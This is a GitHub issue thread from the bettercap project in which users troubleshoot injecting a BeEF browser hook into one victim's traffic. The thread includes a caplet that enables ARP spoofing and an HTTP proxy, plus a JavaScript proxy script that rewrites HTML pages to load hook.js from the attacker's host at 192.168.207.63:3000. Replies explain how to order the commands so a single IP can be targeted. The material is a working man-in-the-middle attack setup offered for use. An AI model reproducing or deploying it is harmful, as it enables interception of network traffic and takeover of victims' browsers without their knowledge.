### ISSUE TITLE
How to use beef-inject¿?

### ISSUE THREAD

**Issue by adon90** [bettercap/bettercap#290]
I am so sorry but I am finding this very difficult to use, plus I haven't found much information.
I am trying to inject beef into into just 1 target and I seem to try to be spoofing all the network, and, I don't receive any beef-hook in the panel. This is how I do that:

`bettercap -caplet beef-active.cap -eval "set arp.spoof.targets 192.168.207.50"`

I want to spoof the IP 192.168.207.50.

my beef-active.cap file is like this:

```# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"

# inject beef hook
set http.proxy.script beef-inject.js
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on
```

and the beef-inject.js file is like this:

```function onLoad() {
    console.log( "BeefInject loaded." );
    console.log("targets: " + env['arp.spoof.targets']);
}

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script type="text/javascript" src="http://192.168.207.63:3000/hook.js"></script></head>' 
            ); 
        }
    }
}
```

I get this when I launch it:

![image](https://user-images.githubusercontent.com/7115563/41143275-fed0e9f8-6af8-11e8-9087-a12111f8fff8.png)

I am using Kali rolling 2018.2, Thanks

**Comment by yungtravla** [comment]
Try putting `set arp.spoof.targets 192.168.207.50` in the caplet file. I think you first start the arp spoofer by loading the caplet, and then set the target. It should be the other way around.

**Comment by yungtravla** [comment]
@adon90 please see fixes implemented in beef-inject module https://github.com/bettercap/bettercap/issues/300

**Comment by azamet90** [comment]
> Try putting `set arp.spoof.targets 192.168.207.50` in the caplet file. I think the mistake you made is that you first start the arp spoofer by loading the caplet, and then set the target. It should be the other way around.
> 
> **Edit:** or you could try switching them around in the command: `bettercap -eval "set arp.spoof.targets 192.168.207.50" -caplet beef-active.cap`, haven't tested it though so not sure if that works. If so pls let me know :)

if the caplet files needs to be edited then the tool shortly must be updated

**Comment by buffermet** [comment]
@azamet90 no it does not. You did not read what I said.

Either configure the ARP spoofer before starting it, or restart it after configuring it.

**Comment by azamet90** [comment]
> @azamet90 no it does not. You did not read what I said.
> 
> Either configure the ARP spoofer before starting it, or restart it after configuring it.

i have this problem:
```
jsinject/jsinject /home/azamet/Masaüstü/beef-inject.js
192.168.43.0/24 > 192.168.43.39  » [11:53:35] [sys.log] [inf] net.sniff starting net.recon as a requirement for net.sniff
192.168.43.0/24 > 192.168.43.39  » [11:53:35] [sys.log] [err] open jsinject/jsinject.js: no such file or directory
```

how to fix it? the wiki page is useless because of nothing is mentioned about this

**Comment by buffermet** [comment]
> open jsinject/jsinject.js: no such file or directory

Use an absolute path.

**Comment by azamet90** [comment]
> > open jsinject/jsinject.js: no such file or directory
> 
> Use an absolute path.

what means absolute path? this is not correct?
jsinject/jsinject /home/azamet/Masaüstü/beef-inject.js

can you give me an example

**Comment by buffermet** [comment]
@azamet90 :
> what means absolute path? this is not correct?

If you don't know what an absolute path is you should use [this](https://www.google.com/) and stop abusing the issues page for a 1:1 tutorial session on how to do basic stuff...
